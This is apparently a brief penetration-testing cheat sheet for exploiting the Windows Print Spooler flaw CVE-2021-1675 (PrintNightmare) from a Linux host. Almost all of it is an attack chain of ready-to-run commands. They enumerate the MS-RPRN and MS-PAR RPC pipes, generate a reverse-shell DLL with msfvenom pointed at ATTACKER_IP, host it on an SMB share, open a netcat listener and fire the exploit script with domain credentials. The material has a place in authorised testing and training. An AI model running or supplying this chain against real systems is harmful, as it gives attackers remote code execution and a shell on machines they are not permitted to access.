PRIMARY CATEGORY → PRINT SPOOLER SERVICE
Theory
Abuse - UNIX-like
Checking if the Target’s RPC Namedpipes are available
Looking for MS-RPRN or MS-PAR pipes enabled
rpcdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' | grep -iP --color -- 'MS-(RPRN|PAR)'Creating a DLL Payload (Reverse Shell)
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --format dll --platform windows --arch x64 --out remote.dllSetting up an SMB Server
smbserver.py -smb2support <SHARE> <LOCAL_PATH>Setting up a Netcat Listener for the Rev. Shell
nc -nlvp <PORT>Running the Exploit
From the Attacker ⚔️
python3 CVE-2021-1675.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' '\\<ATTACKER>\<SHARE>\remote.dll'